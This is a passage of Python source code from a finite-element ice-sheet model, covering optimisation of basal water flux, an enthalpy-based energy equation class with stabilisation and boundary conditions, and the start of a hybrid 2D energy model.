method=\"L-BFGS-B\", tol=1e-9, bounds=bounds,\n\t\t\t options={\"disp\" : True,\n\t\t\t \"maxiter\" : max_iter,\n\t\t\t \"gtol\" : 1e-5})\n\t\t\tB_ring_opt = out[0]\n\n\t\t# or optimize with IPOpt (preferred) :\n\t\telif method == 'ipopt':\n\t\t\ttry:\n\t\t\t\timport pyipopt\n\t\t\texcept ImportError:\n\t\t\t\tinfo_red(\"\"\"You do not have IPOPT and/or pyipopt installed.\n\t\t\t\t When compiling IPOPT, make sure to link against HSL,\n\t\t\t\t as it is a necessity for practical problems.\"\"\")\n\t\t\t\traise\n\t\t\tproblem = MinimizationProblem(F, bounds=bounds)\n\t\t\tparameters = {\"tol\" : 1e-8,\n\t\t\t \"acceptable_tol\" : 1e-6,\n\t\t\t \"maximum_iterations\" : max_iter,\n\t\t\t \"print_level\" : 5,\n\t\t\t \"ma97_order\" : \"metis\",\n\t\t\t \"ma86_order\" : \"metis\",\n\t\t\t \"linear_solver\" : \"ma57\"}\n\t\t\tsolver = IPOPTSolver(problem, parameters=parameters)\n\t\t\tB_ring_opt = solver.solve()\n\n\t\t# let's see it :\n\t\tprint_min_max(B_ring_opt, 'B_ring_opt')\n\n\t\t# extrude the flux up and make the optimal control variable available :\n\t\tB_ring_ext = model.vert_extrude(B_ring_opt, d='up')\n\t\tmodel.init_B_ring(B_ring_ext)\n\t\t#Control(model.B_ring).update(B_ring_ext) # FIXME: does this work?\n\n\t\t# save state to unique hdf5 file :\n\t\tif isinstance(adj_save_vars, list):\n\t\t\ts = '::: saving variables in list arg adj_save_vars :::'\n\t\t\tprint_text(s, 
cls=self)\n\t\t\tout_file = model.out_dir + 'w_opt.h5'\n\t\t\tfoutput = HDF5File(mpi_comm_world(), out_file, 'w')\n\t\t\tfor var in adj_save_vars:\n\t\t\t\tmodel.save_hdf5(var, f=foutput)\n\t\t\tfoutput.close()\n\n\t\t# calculate total time to compute\n\t\ttf = time()\n\t\ts = tf - t0\n\t\tm = s / 60.0\n\t\th = m / 60.0\n\t\ts = s % 60\n\t\tm = m % 60\n\t\ttext = \"time to optimize for water flux: %02d:%02d:%02d\" % (h,m,s)\n\t\tprint_text(text, 'red', 1)\n\n\t\t# save all the objective functional values :\n\t\td = model.out_dir + 'objective_ftnls_history/'\n\t\ts = '::: saving objective functionals to %s :::'\n\t\tprint_text(s % d, cls=self)\n\t\tif model.MPI_rank==0:\n\t\t\tif not os.path.exists(d):\n\t\t\t\tos.makedirs(d)\n\t\t\tnp.savetxt(d + 'time.txt', np.array([tf - t0]))\n\t\t\tnp.savetxt(d + 'Rs.txt', np.array(Rs))\n\t\t\tnp.savetxt(d + 'Js.txt', np.array(Js))\n\t\t\tnp.savetxt(d + 'Ds.txt', np.array(Ds))\n\n\t\t\tfig = plt.figure()\n\t\t\tax = fig.add_subplot(111)\n\t\t\t#ax.set_yscale('log')\n\t\t\tax.set_ylabel(r'$\\mathscr{J}\\left(\\theta\\right)$')\n\t\t\tax.set_xlabel(r'iteration')\n\t\t\tax.plot(np.array(Js), 'r-', lw=2.0)\n\t\t\tplt.grid()\n\t\t\tplt.savefig(d + 'J.png', dpi=100)\n\t\t\tplt.close(fig)\n\n\t\t\ttry:\n\t\t\t\tR = self.R\n\t\t\t\tfig = plt.figure()\n\t\t\t\tax = fig.add_subplot(111)\n\t\t\t\tax.set_yscale('log')\n\t\t\t\tax.set_ylabel(r'$\\mathscr{R}\\left(\\alpha\\right)$')\n\t\t\t\tax.set_xlabel(r'iteration')\n\t\t\t\tax.plot(np.array(Rs), 'r-', lw=2.0)\n\t\t\t\tplt.grid()\n\t\t\t\tplt.savefig(d + 'R.png', dpi=100)\n\t\t\t\tplt.close(fig)\n\t\t\texcept AttributeError:\n\t\t\t\tpass\n\n\t\t\tfig = plt.figure()\n\t\t\tax = fig.add_subplot(111)\n\t\t\t#ax.set_yscale('log')\n\t\t\tax.set_ylabel(r'$\\mathscr{D}\\left(\\theta\\right)$')\n\t\t\tax.set_xlabel(r'iteration')\n\t\t\tax.plot(np.array(Ds), 'r-', lw=2.0)\n\t\t\tplt.grid()\n\t\t\tplt.savefig(d + 'D.png', dpi=100)\n\t\t\tplt.close(fig)\n\n\tdef calc_bulk_density(self):\n\t\t\"\"\"\n\t\tCalculate the bulk density stored in ``model.rhob``.\n\t\t\"\"\"\n\t\t# calculate bulk density :\n\t\ts = \"::: calculating bulk density :::\"\n\t\tprint_text(s, cls=self)\n\t\tmodel = self.model\n\t\trhob = project(self.rho, annotate=False)\n\t\tmodel.assign_variable(model.rhob, rhob)\n\n\n\n\n\n\nclass Enthalpy(Energy):\n\t\"\"\"\n\t\"\"\"\n\tdef initialize(self, model, momentum,\n\t solve_params = None,\n\t transient = False,\n\t use_lat_bc = False,\n\t energy_flux_mode = 'B_ring',\n\t stabilization_method = 'GLS',\n\t reset = False):\n\t\t\"\"\"\n\t\tSet up energy equation residual.\n\t\t\"\"\"\n\t\tself.transient = transient\n\n\t\ts = \"::: INITIALIZING ENTHALPY PHYSICS :::\"\n\t\tprint_text(s, cls=self)\n\n\t\t# save the solver parameters and momentum instance :\n\t\tself.solve_params = solve_params\n\t\tself.momentum = momentum\n\t\tself.linear = True\n\n\t\t# save the state of basal boundary flux :\n\t\tself.energy_flux_mode = energy_flux_mode\n\n\t\t# create a facet function for temperate zone :\n\t\tself.ff = MeshFunction('size_t', model.mesh, 2, 0)\n\n\t\tmesh = model.mesh\n\t\tT = model.T\n\t\talpha = model.alpha\n\t\trho_w = model.rho_w\n\t\tL_f = model.L_f\n\t\tW = model.W\n\t\tT_m = model.T_melt\n\t\tB_ring = model.B_ring\n\t\tT_surface = model.T_surface\n\t\ttheta_surface = model.theta_surface\n\t\ttheta_float = model.theta_float\n\t\ttheta_app = model.theta_app\n\t\ttheta_0 = model.theta\n\t\tq_geo = model.q_geo\n\t\th = model.h\n\t\tdt = model.time_step\n\t\tdOmega = model.dOmega()\n\t\tdGamma_bg = 
model.dGamma_bg()\n\n\t\tself.Q = model.Q\n\n\t\tself.ass_theta = FunctionAssigner(model.Q, self.Q)\n\n\t\tself.set_unknown(Function(self.Q, name='energy.theta'))\n\t\tself.set_trial_function(TrialFunction(self.Q))\n\t\tself.set_test_function(TestFunction(self.Q))\n\n\t\t# define test and trial functions :\n\t\tpsi = self.get_test_function()\n\t\tdtheta = self.get_trial_function()\n\t\ttheta = self.get_unknown()\n\n\t\t# internal friction (strain heat) :\n\t\tQ = self.get_internal_friction_heat()\n\n\t\t# velocity :\n\t\tu = momentum.get_velocity()\n\n\t\t# bulk properties :\n\t\tc = self.get_bulk_heat_capacity()\n\t\tk = self.get_bulk_thermal_conductivity()\n\t\trho = self.get_bulk_density()\n\n\t\t# discontinuous with water, J/(a*m*K) :\n\t\tkappa = self.get_enthalpy_gradient_conductivity()\n\n\t\t# bulk enthalpy-gradient diffusivity\n\t\tXi = self.get_enthalpy_gradient_diffusivity()\n\n\t\t# frictional heating :\n\t\tq_fric = self.get_external_friction_heat()\n\n\t\t# basal heat-flux natural boundary condition :\n\t\tq_tm = self.get_temperature_melting_flux_vector()\n\t\tn = model.N\n\t\tg_w = dot(q_tm, n) + rho_w*L_f*B_ring\n\t\tg_n = q_geo + q_fric\n\t\tif energy_flux_mode == 'zero_energy' or energy_flux_mode == 'B_ring':\n\t\t\ts = \" - using B_ring-energy flux boundary condition -\"\n\t\t\tprint_text(s, cls=self)\n\t\t\tg_b = g_n - alpha*g_w\n\t\telif energy_flux_mode == 'temperate_zone_mark':\n\t\t\ts = \" - using temperate-zone mark energy flux boundary condition -\"\n\t\t\tprint_text(s, cls=self)\n\t\t\tg_b = g_n\n\t\telse:\n\t\t\ts = \">>> PARAMETER 'energy_flux_mode' MAY BE 'zero_energy', \" + \\\n\t\t\t \"'B_ring', or 'temperate_zone_mark', NOT '%s' <<<\"\n\t\t\tprint_text(s % energy_flux_mode , 'red', 1)\n\t\t\tsys.exit(1)\n\n\t\t# configure the module to run in steady state :\n\t\tif not transient:\n\t\t\tprint_text(\" - using steady-state formulation -\", cls=self)\n\t\t\tnu = 1.0\n\t\telse:\n\t\t\tprint_text(\" - using transient formulation -\", cls=self)\n\t\t\tnu = 0.5\n\n\t\t# form time-interpolated unknown :\n\t\ttheta_mid = nu*dtheta + (1 - nu)*theta_0\n\n\t\t# quasi-velocity (see Cummings et al., 2016)\n\t\tut = rho*u - grad(kappa/c)\n\t\tut_norm = sqrt(dot(ut, ut) + DOLFIN_EPS)\n\n\t\t# the Peclet number :\n\t\tPe = self.get_grid_peclet_number()\n\n\t\t# for linear elements :\n\t\tif model.order == 1:\n\t\t xi = 1/tanh(Pe) - 1/Pe\n\n\t\t# for quadradic elements :\n\t\telif model.order == 2:\n\t\t\txi_1 = 0.5*(1/tanh(Pe) - 2/Pe)\n\t\t\txi = ((3 + 3*Pe*xi_1)*tanh(Pe) - (3*Pe + Pe**2*xi_1)) \\\n\t\t\t\t / ((2 - 3*xi_1*tanh(Pe))*Pe**2)\n\n\t\t# intrinsic time parameter :\n\t\ttau = h*xi / (2 * ut_norm)\n\t\tpsihat = psi + tau * dot(ut, grad(psi))\n\n\t\t# the linear differential operator for this problem :\n\t\tdef Lu(theta):\n\t\t\treturn + rho * dot(u, grad(theta)) \\\n\t\t\t - kappa/c * div(grad(theta)) \\\n\t\t\t - dot(grad(kappa/c), grad(theta))\n\n\t\t# the advective part of the operator :\n\t\tdef L_adv(theta):\n\t\t\treturn dot(ut, grad(theta))\n\n\t\t# the adjoint of the operator :\n\t\tdef L_star(theta):\n\t\t\treturn - dot(u, grad(theta)) \\\n\t\t\t - Xi * div(grad(theta)) \\\n\t\t\t + 1/rho * dot(grad(kappa/c), grad(theta))\n\n\t\t# use streamline-upwind/Petrov-Galerkin stabilization :\n\t\tif stabilization_method == 'SUPG':\n\t\t\ts = \" - using streamline-upwind/Petrov-Galerkin stabilization -\"\n\t\t\tLL = lambda x: + L_adv(x)\n\t\t# use Galerkin/least-squares stabilization :\n\t\telif stabilization_method == 'GLS':\n\t\t\ts = \" - using 
Galerkin/least-squares stabilization -\"\n\t\t\tLL = lambda x: + Lu(x)\n\t\t# use subgrid-scale-model stabilization :\n\t\telif stabilization_method == 'SSM':\n\t\t\ts = \" - using subgrid-scale-model stabilization -\"\n\t\t\tLL = lambda x: - L_star(x)\n\t\tprint_text(s, cls=self)\n\n\t\t# form the residual :\n\t\tresid = + rho * dot(u, grad(theta_mid)) * psi * dOmega \\\n\t\t\t + kappa/c * inner(grad(psi), grad(theta_mid)) * dOmega \\\n\t\t\t - dot(grad(kappa/c), grad(theta_mid)) * psi * dOmega \\\n\t\t\t - g_b * psi * dGamma_bg \\\n\t\t\t - Q * psi * dOmega \\\n\t\t\t + inner(LL(psi), tau*(Lu(theta_mid) - Q)) * dOmega \\\n\n\t\t# add the time derivative term if transient :\n\t\tif transient:\n\t\t\tresid += rho * (dtheta - theta_0) / dt * psi * dOmega\n\n\t\t# set this Physics instance's residual, left-, and right-hand sides :\n\t\tself.set_residual(resid)\n\n\t\t# surface boundary condition :\n\t\ttheta_bcs = []\n\t\tif model.N_GAMMA_S_GND > 0:\n\t\t\ttheta_bcs.append( DirichletBC(self.Q, theta_surface,\n\t\t\t model.ff, model.GAMMA_S_GND) )\n\t\tif model.N_GAMMA_U_GND > 0:\n\t\t\ttheta_bcs.append( DirichletBC(self.Q, theta_surface,\n\t\t\t model.ff, model.GAMMA_U_GND) )\n\t\tif model.N_GAMMA_S_FLT > 0:\n\t\t\ttheta_bcs.append( DirichletBC(self.Q, theta_surface,\n\t\t\t model.ff, model.GAMMA_S_FLT) )\n\t\tif model.N_GAMMA_U_FLT > 0:\n\t\t\ttheta_bcs.append( DirichletBC(self.Q, theta_surface,\n\t\t\t model.ff, model.GAMMA_U_FLT) )\n\n\t\t# apply T_melt conditions of portion of ice in contact with water :\n\t\tif model.N_GAMMA_B_FLT > 0:\n\t\t\ttheta_bcs.append( DirichletBC(self.Q, theta_float,\n\t\t\t model.ff, model.GAMMA_B_FLT) )\n\t\tif model.N_GAMMA_L_UDR > 0:\n\t\t\ttheta_bcs.append( DirichletBC(self.Q, theta_float,\n\t\t\t model.ff, model.GAMMA_L_UDR) )\n\n\t\t# apply lateral ``divide'' boundaries if desired :\n\t\tif use_lat_bc:\n\t\t\ts = \" - using divide-lateral boundary conditions -\"\n\t\t\tprint_text(s, cls=self)\n\t\t\tif model.N_GAMMA_L_DVD > 0:\n\t\t\t\ttheta_bcs.append( DirichletBC(self.Q, model.theta_app,\n\t\t\t\t model.ff, model.GAMMA_L_DVD) )\n\n\t\t# update this Physics instance's list of boundary conditions :\n\t\tself.set_boundary_conditions(theta_bcs)\n\n\t\t# initialize the boundary conditions and thermal properties, if\n\t\t# we have not done so already :\n\t\tif not reset:\n\t\t\t# calculate energy and temperature melting point :\n\t\t\tself.calc_T_melt(annotate=False)\n\n\t\t\tT_v = T.vector().get_local()\n\t\t\tW_v = W.vector().get_local()\n\t\t\tT_s_v = T_surface.vector().get_local()\n\t\t\tT_m_v = T_m.vector().get_local()\n\t\t\tTp_v = T_v.copy()\n\t\t\ttheta_s_v = 146.3*T_s_v + 7.253/2.0*T_s_v**2\n\t\t\ttheta_f_v = 146.3*(T_m_v - 1.0) + 7.253/2.0*(T_m_v - 1.0)**2\n\t\t\ttheta_i_v = 146.3*T_v + 7.253/2.0*T_v**2 + W_v * L_f(0)\n\n\t\t\t# Surface boundary condition :\n\t\t\ts = \"::: calculating energy boundary conditions :::\"\n\t\t\tprint_text(s, cls=self)\n\n\t\t\t# initialize the boundary conditions :\n\t\t\tmodel.init_theta_surface(theta_s_v)\n\t\t\tmodel.init_theta_app(theta_s_v)\n\t\t\tmodel.init_theta_float(theta_f_v)\n\n\t\t\t# initialize energy from W and T :\n\t\t\tmodel.init_theta(theta_i_v)\n\n\tdef calc_Pe(self, avg=False, annotate=annotate):\n\t\tr\"\"\"\n\t\tcalculates the grid P\\'{e}clet number to self.model.Pe.\n\n\t\tif avg=True, calculate the vertical average.\n\t\t\"\"\"\n\t\ts = \"::: calculating Peclet number :::\"\n\t\tprint_text(s, cls=self)\n\n\t\tPe = self.get_grid_peclet_number()\n\t\tif avg: Pe = self.model.calc_vert_average(Pe, 
annotate=annotate)\n\t\telse: Pe = project(Pe, solver_type='iterative', annotate=annotate)\n\t\tself.model.assign_variable(self.model.Pe, Pe, annotate=annotate)\n\n\tdef calc_vert_avg_W(self):\n\t\t\"\"\"\n\t\tcalculates the vertical average water content W, saved to model.Wbar.\n\t\t\"\"\"\n\t\ts = \"::: calculating vertical average internal water content :::\"\n\t\tprint_text(s, cls=self)\n\n\t\tWbar = self.model.calc_vert_average(self.model.W)\n\t\tself.model.init_Wbar(Wbar)\n\n\tdef calc_vert_avg_strain_heat(self):\n\t\t\"\"\"\n\t\tcalculates integrated strain-heating, saved to model.Qbar.\n\t\t\"\"\"\n\t\ts = \"::: calculating vertical average strain heat :::\"\n\t\tprint_text(s, cls=self)\n\n\t\t# calculate downward vertical integral :\n\t\tQ = self.get_internal_friction_heat()\n\t\tQbar = self.model.calc_vert_average(Q)\n\t\tself.model.init_Qbar(Qbar)\n\n\tdef calc_temperate_thickness(self):\n\t\t\"\"\"\n\t\tcalculates the temperate zone thickness, saved to model.alpha_int.\n\t\t\"\"\"\n\t\ts = \"::: calculating temperate zone thickness :::\"\n\t\tprint_text(s, cls=self)\n\n\t\tmodel = self.model\n\t\talpha_int = model.vert_integrate(model.alpha, d='down')\n\t\talpha_int = model.vert_extrude(alpha_int, d='up')\n\t\tmodel.init_alpha_int(alpha_int)\n\n\tdef calc_temp_rat(self):\n\t\t\"\"\"\n\t\tcalculates the ratio of the temperate zone, saved to model.temp_rat.\n\t\t\"\"\"\n\t\ts = \"::: calculating ratio of column that is temperate :::\"\n\t\tprint_text(s, cls=self)\n\n\t\tmodel = self.model\n\n\t\tself.calc_temperate_thickness()\n\n\t\t# TODO: the operation below breaks dolfin-adjoint annotation.\n\t\tS_v = model.S.vector().get_local()\n\t\tB_v = model.B.vector().get_local()\n\t\talpha_int_v = model.alpha_int.vector().get_local()\n\t\tH_v = S_v - B_v + DOLFIN_EPS\n\t\ttemp_rat_v = alpha_int_v / H_v\n\t\ttemp_rat_v[temp_rat_v < 0.0] = 0.0\n\t\ttemp_rat_v[temp_rat_v > 1.0] = 1.0\n\t\tmodel.init_temp_rat(alpha_int_v / H_v)\n\n\tdef calc_T_melt(self, annotate=False):\n\t\t\"\"\"\n\t\tCalculates temperature melting point model.T_melt and energy melting point\n\t\tmodel.theta_melt.\n\n\t\t\"\"\"\n\t\ts = \"::: calculating pressure-melting temperature :::\"\n\t\tprint_text(s, cls=self)\n\n\t\tmodel = self.model\n\n\t\tgamma = model.gamma\n\t\tT_w = model.T_w\n\t\tp = model.p\n\n\t\t# TODO: the operation below breaks dolfin-adjoint annotation.\n\t\tp_v = p.vector().get_local()\n\t\tTm = T_w(0) - gamma(0)*p_v\n\t\ttht_m = 146.3*Tm + 7.253/2.0*Tm**2\n\n\t\tmodel.assign_variable(model.T_melt, Tm, annotate=annotate)\n\t\tmodel.assign_variable(model.theta_melt, tht_m, annotate=annotate)\n\n\tdef get_solve_params(self):\n\t\t\"\"\"\n\t\tReturns the solve parameters.\n\t\t\"\"\"\n\t\treturn self.solve_params\n\n\tdef default_solve_params(self):\n\t\t\"\"\"\n\t\tReturns a set of default solver parameters that yield good performance\n\t\t\"\"\"\n\t\tnparams = {'newton_solver' : {'linear_solver' : 'gmres',\n\t\t 'preconditioner' : 'hypre_amg',\n\t\t 'relative_tolerance' : 1e-13,\n\t\t 'relaxation_parameter' : 1.0,\n\t\t 'maximum_iterations' : 20,\n\t\t 'error_on_nonconvergence' : False}}\n\t\tparams = {'solver' : {'linear_solver' : 'mumps',\n\t\t 'preconditioner' : 'none'},\n\t\t 'nparams' : nparams,\n\t\t 'use_surface_climate' : False}\n\t\treturn params\n\n\tdef mark_temperate_zone(self):\n\t\t\"\"\"\n\t\tmark basal regions with overlying temperate layer to model.alpha.\n\t\t\"\"\"\n\t\ts = \"::: marking basal regions with an overlying temperate layer :::\"\n\t\tprint_text(s, cls=self)\n\n\t\t# 
TODO: the operation below breaks dolfin-adjoint annotation.\n\t\tW_v = self.model.W.vector().get_local()\n\t\talpha_v = self.model.alpha.vector().get_local()\n\t\talpha_v[:] = 0\n\t\talpha_v[W_v > 0] = 1\n\t\tself.model.init_alpha(alpha_v)\n\n\tdef calc_basal_temperature_flux(self, annotate=False):\n\t\t\"\"\"\n\t\tSolve for the basal temperature flux stored in model.gradT_B.\n\t\t\"\"\"\n\t\t# calculate melt-rate :\n\t\ts = \"::: solving basal temperature flux k \\\\nabla T \\\\cdot n :::\"\n\t\tprint_text(s, cls=self)\n\n\t\tn_b = self.model.n_b\n\t\tq = self.get_temperature_flux_vector()\n\t\tq_dot_n = project(dot(q, n_b), self.model.Q, annotate=annotate)\n\t\tself.model.assign_variable(self.model.gradT_B, q_dot_n, annotate=annotate)\n\t\tprint_min_max(self.model.gradT_B, 'gradT_B')\n\n\tdef calc_basal_temperature_melting_flux(self, annotate=False):\n\t\t\"\"\"\n\t\tSolve for the basal temperature melting flux stored in model.gradTm_B.\n\t\t\"\"\"\n\t\t# calculate melt-rate :\n\t\ts = \"::: solving basal temperature flux k \\\\nabla T_m \\\\cdot n :::\"\n\t\tprint_text(s, cls=self)\n\n\t\tn_b = self.model.n_b\n\t\tq = self.get_temperature_melting_flux_vector()\n\t\tq_dot_n = project(dot(q, n_b), self.model.Q, annotate=annotate)\n\t\tself.model.assign_variable(self.model.gradTm_B, q_dot_n, annotate=annotate)\n\t\tprint_min_max(self.model.gradTm_B, 'gradTm_B')\n\n\tdef calc_basal_melting_rate(self, annotate=False):\n\t\t\"\"\"\n\t\tSolve for the basal melt rate stored in model.Mb.\n\t\t\"\"\"\n\t\t# calculate melt-rate :\n\t\ts = \"::: solving basal-melt-rate :::\"\n\t\tprint_text(s, cls=self)\n\n\t\tM_b = project(self.get_basal_melting_rate(), self.model.Q, \\\n\t\t annotate=annotate)\n\t\tself.model.assign_variable(self.model.Mb, M_b, annotate=annotate)\n\n\tdef calc_q_fric(self, annotate=False):\n\t\tr\"\"\"\n\t\tSolve for the friction heat term stored in ``model.q_fric``.\n\t\t\"\"\"\n\t\t# calculate melt-rate :\n\t\ts = \"::: solving basal friction heat :::\"\n\t\tprint_text(s, cls=self)\n\n\t\tq_fric = project(self.get_external_friction_heat(), self.model.Q, \\\n\t\t annotate=annotate)\n\t\tself.model.assign_variable(self.model.q_fric, q_fric, annotate=annotate)\n\n\tdef derive_temperate_zone(self, annotate=False):\n\t\t\"\"\"\n\t\tSolve the steady-state energy equation, saving enthalpy to model.theta,\n\t\ttemperature to model.T, and water content to model.W such that the\n\t\tregions with overlying temperate ice are properly marked by model.alpha.\n\t\t\"\"\"\n\t\tmodel = self.model\n\n\t\t# solve the energy equation :\n\t\ts = \"::: solving for temperate zone locations :::\"\n\t\tprint_text(s, cls=self)\n\n\t\t# ensure that the boundary-marking process is done in steady state :\n\t\ttransient = False\n\t\tif self.transient:\n\t\t\tself.make_steady_state()\n\t\t\ttransient = True\n\n\t\t# put the physics in temperate zone marking mode :\n\t\tzef = False # stays False if we are already in temperate-zone-marking mode\n\t\tif self.energy_flux_mode != 'temperate_zone_mark':\n\t\t\tzef = True\n\t\t\tmode = self.energy_flux_mode\n\t\t\tself.set_basal_flux_mode('temperate_zone_mark')\n\n\t\t# solve the linear system :\n\t\tsolve(self.get_lhs() == self.get_rhs(), self.get_unknown(),\n\t\t self.get_boundary_conditions(),\n\t\t solver_parameters = self.solve_params['solver'], annotate=annotate)\n\n\t\t# calculate water content :\n\t\t# TODO: the operation below breaks dolfin-adjoint annotation.\n\t\ttheta_v = self.get_unknown().vector().get_local()\n\t\ttheta_melt_v = model.theta_melt.vector().get_local()\n\t\tW_v = (theta_v - theta_melt_v) / model.L_f(0)\n\t\tW_v[W_v < 0.0] = 0.0 # 
no water where frozen, please.\n\n\t\t# mark appropriately basal regions with an overlying temperate layer :\n\t\t# TODO: the operation below breaks dolfin-adjoint annotation.\n\t\talpha_v = model.alpha.vector().get_local()\n\t\talpha_v[:] = 0\n\t\talpha_v[W_v > 0] = 1\n\t\tmodel.init_alpha(alpha_v)\n\n\t\t# reset to previous energy flux mode, if necessary :\n\t\tif zef:\n\t\t\tself.set_basal_flux_mode(mode)\n\n\t\t# convert back to transient if necessary :\n\t\tif transient:\n\t\t\tself.make_transient(time_step = model.time_step)\n\n\tdef update_thermal_parameters(self, annotate=False):\n\t\t\"\"\"\n\t\tfixed-point iterations to make all linearized thermal parameters consistent.\n\t\t\"\"\"\n\t\t# TODO: the operation below breaks dolfin-adjoint annotation.\n\t\tmodel = self.model\n\n\t\t# solve the energy equation :\n\t\ts = \"::: updating thermal parameters :::\"\n\t\tprint_text(s, cls=self)\n\n\t\t# ensure that we have steady state :\n\t\ttransient = False\n\t\tif self.transient:\n\t\t\tself.make_steady_state()\n\t\t\ttransient = True\n\n\t\t# previous theta for norm calculation\n\t\tU_prev = self.get_unknown().copy(True)\n\n\t\t# iteration counter :\n\t\tcounter = 1\n\n\t\t# maximum number of iterations :\n\t\tmax_iter = 1000\n\n\t\t# L_2 error norm between iterations :\n\t\tabs_error = np.inf\n\t\trel_error = np.inf\n\n\t\t# tolerances for stopping criteria :\n\t\tatol = 1e-7\n\t\trtol = 1e-8\n\n\t\t# perform a fixed-point iteration until the L_2 norm of error\n\t\t# is less than tolerance :\n\t\twhile abs_error > atol and rel_error > rtol and counter <= max_iter:\n\n\t\t\t# solve the linear system :\n\t\t\tsolve(self.get_lhs() == self.get_rhs(), self.get_unknown(),\n\t\t\t self.get_boundary_conditions(),\n\t\t\t solver_parameters = self.solve_params['solver'], annotate=annotate)\n\n\t\t\t# calculate L_2 norms :\n\t\t\tabs_error_n = norm(U_prev.vector() - self.get_unknown().vector(), 'l2')\n\t\t\ttht_nrm = norm(self.get_unknown().vector(), 'l2')\n\n\t\t\t# save convergence history :\n\t\t\tif counter == 1:\n\t\t\t\trel_error = abs_error_n\n\t\t\telse:\n\t\t\t\trel_error = abs(abs_error - abs_error_n)\n\n\t\t\t# print info to screen :\n\t\t\tif model.MPI_rank == 0:\n\t\t\t\ts0 = '>>> '\n\t\t\t\ts1 = 'thermal parameter update iteration %i (max %i) done: ' \\\n\t\t\t\t % (counter, max_iter)\n\t\t\t\ts2 = 'r (abs) = %.2e ' % abs_error\n\t\t\t\ts3 = '(tol %.2e), ' % atol\n\t\t\t\ts4 = 'r (rel) = %.2e ' % rel_error\n\t\t\t\ts5 = '(tol %.2e)' % rtol\n\t\t\t\ts6 = ' <<<'\n\t\t\t\ttext0 = get_text(s0, 'red', 1)\n\t\t\t\ttext1 = get_text(s1, 'red')\n\t\t\t\ttext2 = get_text(s2, 'red', 1)\n\t\t\t\ttext3 = get_text(s3, 'red')\n\t\t\t\ttext4 = get_text(s4, 'red', 1)\n\t\t\t\ttext5 = get_text(s5, 'red')\n\t\t\t\ttext6 = get_text(s6, 'red', 1)\n\t\t\t\tprint(text0 + text1 + text2 + text3 + text4 + text5 + text6)\n\n\t\t\t# update error stuff and increment iteration counter :\n\t\t\tabs_error = abs_error_n\n\t\t\tU_prev = self.get_unknown().copy(True)\n\t\t\tcounter += 1\n\n\t\t\t# update the model variable :\n\t\t\tself.update_model_var(self.get_unknown(), annotate=annotate)\n\n\t\t\t# update the temperature and water content for other physics :\n\t\t\tself.partition_energy(annotate=annotate)\n\n\t\t# convert back to transient if necessary :\n\t\tif transient:\n\t\t\tself.make_transient(time_step = model.time_step)\n\n\tdef solve(self, annotate=False):\n\t\t\"\"\"\n\t\tSolve the energy equations, saving energy to ``model.theta``, temperature\n\t\tto ``model.T``, and water content to 
``model.W``.\n\t\t\"\"\"\n\t\tmodel = self.model\n\n\t\t# update the surface climate if desired :\n\t\tif self.solve_params['use_surface_climate']: self.solve_surface_climate()\n\n\t\t# solve as defined in ``physics.Physics.solve()`` :\n\t\tsuper(Energy, self).solve(annotate)\n\n\t\t# update the temperature and water content for other physics :\n\t\tself.partition_energy(annotate=False)\n\n\tdef update_model_var(self, u, annotate=False):\n\t\t\"\"\"\n\t\tUpdate the energy function ``self.model.theta`` to those given by ``u``.\n\t\t\"\"\"\n\t\tself.ass_theta.assign(self.model.theta, u, annotate=annotate)\n\t\tprint_min_max(self.model.theta, 'theta')\n\n\n\n\n\n\nclass EnergyHybrid(Energy):\n\t\"\"\"\n\tNew 2D hybrid model.\n\n\tOriginal author: Doug Brinkerhoff: https://dbrinkerhoff.org/\n\t\"\"\"\n\t# TODO: `energy_flux_mode` and `stabilization_method` makes no sense here.\n\tdef initialize(self, model, momentum,\n\t solve_params = None,\n\t transient = False,\n\t use_lat_bc = False,\n\t energy_flux_mode = 'B_ring',\n\t stabilization_method = 'GLS'):\n\t\t\"\"\"\n\t\tSet up energy equation residual.\n\t\t\"\"\"\n\t\ts = \"::: INITIALIZING HYBRID ENERGY PHYSICS :::\"\n\t\tprint_text(s, cls=self)\n\n\t\tif type(model) != D2Model:\n\t\t\ts = \">>> EnergyHybrid REQUIRES A 'D2Model' INSTANCE, NOT %s <<<\"\n\t\t\tprint_text(s % type(model) , 'red', 1)\n\t\t\tsys.exit(1)\n\n\t\t# save the solver parameters :\n\t\tself.solve_params = solve_params\n\n\t\tself.transient = transient\n\n\t\t# CONSTANTS\n\t\tyear = model.spy\n\t\tg = model.g\n\t\tn = model.n\n\n\t\tk = model.k_i\n\t\trho = model.rho_i\n\t\tCp = model.c_i\n\t\tkappa = year*k/(rho*Cp)\n\n\t\tq_geo = model.q_geo\n\t\tS = model.S\n\t\tB = model.B\n\t\tbeta = model.beta\n\t\tT_s = model.T_surface\n\t\tT_w = model.T_w\n\t\tH = model.H\n\t\tH0 = model.H0\n\t\tT_ = model.T_\n\t\tT0_ = model.T0_\n\t\tdeltax = model.deltax\n\t\tsigmas = model.sigmas\n\t\teps_reg = model.eps_reg\n\t\th = model.h\n\t\tdt = model.time_step\n\t\tN_T = model.N_T\n\n\t\tBc = 3.61e-13*year\n\t\tBw = 1.73e3*year # model.a0 ice hardness\n\t\tQc = 6e4\n\t\tQw = model.Q0 # ice act. 
energy\n\t\tRc = model.R # gas constant\n\t\tgamma = model.gamma # pressure melting point depth dependence\n\n\t\t# get velocity components :\n\t\t# ANSATZ\n\t\tcoef = [lambda s:1.0, lambda s:1./4.*(5*s**4 - 1.0)]\n\t\tdcoef = [lambda s:0.0, lambda s:5*s**3]\n\n\t\tU = momentum.U\n\t\tu_ = [U[0], U[2]]\n\t\tv_ = [U[1], U[3]]\n\n\t\tu = VerticalBasis(u_, coef, dcoef)\n\t\tv = VerticalBasis(v_, coef, dcoef)\n\n\t\t# FUNCTION SPACES\n\t\tQ = model.Q\n\t\tZ = model.Z\n\n\t\t# ENERGY BALANCE\n\t\tPsi = TestFunction(Z)\n\t\tdT = TrialFunction(Z)\n\n\t\tT = VerticalFDBasis(T_, deltax, coef, sigmas)\n\t\tT0 = VerticalFDBasis(T0_, deltax, coef, sigmas)\n\n\t\t# METRICS FOR COORDINATE TRANSFORM\n\t\tdef dsdx(s):\n\t\t\treturn 1./H*(S.dx(0) - s*H.dx(0))\n\n\t\tdef dsdy(s):\n\t\t\treturn 1./H*(S.dx(1) - s*H.dx(1))\n\n\t\tdef dsdz(s):\n\t\t\treturn -1./H\n\n\t\tdef epsilon_dot(s):\n\t\t\treturn ( + (u.dx(s,0) + u.ds(s)*dsdx(s))**2 \\\n\t\t\t + (v.dx(s,1) + v.ds(s)*dsdy(s))**2 \\\n\t\t\t + (u.dx(s,0) + u.ds(s)*dsdx(s))*(v.dx(s,1) + 